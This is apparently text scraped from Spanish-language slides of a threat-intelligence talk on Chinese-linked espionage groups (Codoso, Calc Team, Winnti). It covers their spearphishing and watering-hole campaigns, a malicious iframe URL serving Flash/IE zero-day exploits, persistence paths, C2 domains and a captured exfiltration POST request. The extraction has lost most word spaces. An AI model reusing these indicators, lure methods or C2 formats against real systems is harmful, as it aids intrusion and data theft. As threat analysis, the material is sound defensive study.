  • 24. Codoso Team - TTPs ▪ SpearPhishingemails ▪ Waterholing ▪ Hanutilizadovulnerabidades0day ▪ Troyanohechoamedida:Mad Hatter/Codoso ▪ Utilizancorreosseñueloscontemasrelacioadosa problemasconChina,eventosmundialesypolitica internacional.
  • 25. Codoso Team – Campanha 1 ▪ Ennoviembredel2014,Codosoinfectolaconocidaweb forbes.com einyectouniframemalicioso: http://74.207.254.87/83a08vkzvt/8hthrx.swf ▪ Elobjectivo:explotar2vulnerabilidades0dayenFlash Player(CVE-2014-9163)eInternetExplorer9+ (CVE-2015-0071) ▪ SiesXPsoloseutilizaCVE-2014-9163,perosies Vista+exploitatambienIEparabypasseasASLR
  • 26. Codoso Team – Campanha 1 ▪ Checks
  • 27. Codoso Team – Campanha 1 ▪ ElexploitdescargaunaDLL(wuservice.dll)ylacarga en memoria. ▪ EstaDLLenumeraelequipoejecutandocomandosde reconocimiento:systeminfo, ipconfig, tasklist. ▪ EnvialainformacionrecaudadaenelVIEWSTATEbase 64 ▪ UnasegundaDLLcifradaconXOR(0x67)esdescargadae inyectadaenmemoria.
  • 28. Calc Team ▪ Activodesdeel2009,grupodeespionajeconnexosa China. ▪ HistoricamentesusobjetivoshansidoTaiwanyUSAconel finderecolectarinteligencia. ▪ Tecnicapreferida:Correoselectronicos+ingenieriasocial utilizandosiempretemasdegeopolitica. ▪ Explotovulnerabilidadesyaparchadas ▪ Utiliza3“familias”demalware
  • 29. Calc Team – Campanha 1 ▪ Spearphishing,“G20 Briefing Paper.zip” que contiene2binariosmaliciosos(.exe) ▪ G20DiscussionPaper.exe ▪ GPFIWorkPlan2013.exe ▪ LosbinariosescribenyabrenunarchivoPDFlegitimocon elvisorpordefecto. ▪ Secopiaa%TEMP%, ycreaunallavederegistropara serejecutadocuandoelequipoinicia (KeyLoggery dropper) ▪ Alcopiarse,seejecutaconelparametro“again”ycontacta astatus.acmetoy.com
  • 30. Calc Team – Campanha 1
  • 31. Calc Team – Campanha 1
  • 32. Calc Team – Campanha 2 ▪ Noviembre2015,APEC ▪ BriefingPaperonthePresident'sScheduleduringtheAPEC LeadersMeeting.zip ▪ Hojadecalculo(.xls)conunmacroobfuscadoembebido. ▪ Escribe ▪ %TEMP%AELMEntertainmentbudgetandAttendanceallowance.xls ▪ %TEMP%1C234643A8A8.tmp–Scriptdelimpieza ▪ %TEMP%1C224643A8B8.js –MalwareenJS ▪ HKCUSoftwareMicrosoftWindowsCurrentVersionRun network
  • 33. Calc Team – Campanha 2
  • 34. Calc Team – Campanha 2
  • 35. Calc Team – Campanha 2
  • 36. Calc Team – Campanha 2 ▪ POST/common.phpHTTP/1.1 Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1; Trident/5.0) Referer:https://www.google.com Content-Length:248 Accept:*/* Host:presentation.twilightXXXXXX.com Connection:Keep-Alive action=aaa&data=NzQzMDFjYzNjOWVmOTBiNDIzZDdiNDI 0ZDI2NDNiMGZ8MTcyLjE2LjI1NS4yfFdJTFNPTk5FTEx ZfFdJTFNPTk5FTExZXEFkbWluaXN0cmF0b3IoYWRta W5pc3RyYXRvcil8TWljcm9zb2Z0IFdpbmRvd3MgWF AgUHJvZmVzc2lvbmFsfDE3Mi4xNi4yNTUuMTo4ODg 4fGpzbmVbMS40XSxpbXB0LHByfA%3D%3D
  • 37. Winnti Team ▪ Identificadoen2009 ▪ Susataqueshansidoenfocadosalaindustriadejuegos primariamentepararobarcertificadosdigitalesque permitansoportenactividadesdecyberespionajeaotros objetivos. ▪ Nexosconotrosgruposdeespionajeconloscuales compartecertificadosdigitales
  • 43. Conclusiones ▪ AdvancedPersistentThreat? ▪ ElCyberEsiponajecontinuaraimplementandocuanta tecnicapuedasiempreycuandoseaefectiva ▪ Gruposdeespionajeorientalesutilizanlainformacion recaudaparafortacelersuindustriainernamientrasque occidentetieneotrosfines. ▪ Sudamerica?Peru?